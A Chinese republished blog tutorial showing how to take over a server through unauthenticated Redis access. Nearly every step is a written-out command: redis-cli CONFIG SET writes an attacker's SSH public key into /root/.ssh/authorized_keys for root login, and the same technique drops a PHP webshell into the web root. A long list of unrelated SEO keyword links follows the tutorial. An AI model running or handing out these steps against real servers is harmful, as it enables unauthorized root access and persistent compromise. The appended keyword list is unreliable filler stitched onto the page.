Redis未授权访问导致服务器被控制
发表于:2025-02-02 作者:千家信息网编辑
千家信息网最后更新 2025年02月02日,通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!首先使用下列命令安装Redis tools:root@kali:~# apt-get install r
千家信息网最后更新 2025年02月02日Redis未授权访问导致服务器被控制
通过使用nmap扫描,发现某一端口对应的服务为Redis,然后我们可以尝试看看是否是未授权访问!
首先使用下列命令安装Redis tools:
root@kali:~# apt-get install redis-tools
然后通过下列命令看是否是未授权访问:
root@kali:~# redis-cli -h 10.198.131.110.198.131.1:6379>
然后我们可以使用免密登录的方式进行相关***:
生成公钥:
root@lsy:~/.ssh# ssh-keygen -t rsaroot@lsy:~/.ssh# cat id_rsa.pub ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsyroot@lsy:~/.ssh#
将公钥写入远程服务器:
root@lsy:~/.ssh# redis-cli -h 10.198.131.110.198.131.1:6379> CONFIG SET dir /root/.ssh/OK10.198.131.1:6379> CONFIG SET dbfilename authorized_keysOK10.198.131.1:6379> set xxxx "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC3lO+OSwj2zQuGON15ATfVwJAtLLbiswFoV/uqFHrw0BxaWSHTWgtrlzXyDen/ktDDBjfERlDys0vcZ3NQZ0/W+fWzbQkZbj/ABFsthhdQpdWWRz6wwOxY2tAKYhiZTcLchdFTnrU3+fkwD+im2W966A5UEZZmzTzTi/qA9BZwZghRrEx8Mr5+jVhQ8mYbR0QooggxTlafsavsBAG/aBTShoEanOuL4Pdx5aevmT3ydhwEJFwQQjBkARc8AUFY8cyS0/iPzT010uZYYHCPzhzm25QUSSbvIz9m7Mjwno72/OhKMCmVURkY4S1O4yXFzk+TlQ8P5jm+/pomKd++aPSn root@lsy\n\n\n"OK10.198.131.1:6379> saveOK10.198.131.1:6379> exit
使用ssh远程登录:
root@lsy:~/.ssh# ssh 10.198.131.1
免密登录成功:
上传webshell
#redis-cli -h 192.168.2.5 -p 6379192.168.2.5:6379>config set dir /var/wwww/html192.168.2.5:6379>config set dbfilename 1.php192.168.2.5:6379>set webshell ""192.168.2.5:6379>save
登录
服务
公钥
命令
服务器
成功
方式
端口
尝试
生成
控制
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
上海安装软件开发预算
2.5寸服务器硬盘选择
关于网络安全利与弊的手抄报
学校网络安全规划
客户端主动连接服务器
网络安全概念股新闻
网络安全问题带来的后果
中国物联网服务器何时启动
2021郑州网络安全会议
回流焊软件开发
wiki源码 不需要数据库
ktsk服务器故障码err60
网络技术项目可行报告
集中管理服务器 数量 终端
数据库如何修改登录方式
汕尾通讯软件开发代理价格
为什么迷你服务器连接失败
网络安全 的段子
河北省网络安全管理条例
浙江大学数据库系统考卷
滁州回收服务器价格
安装数据库提示重启
linux 运行服务器
数据库老师的评价
数据库设计原子性
数据库的优点和特点
个旧市委网络安全宣传周
数据库 添加属性
战地3举报服务器管理员
服务器网络映射到本地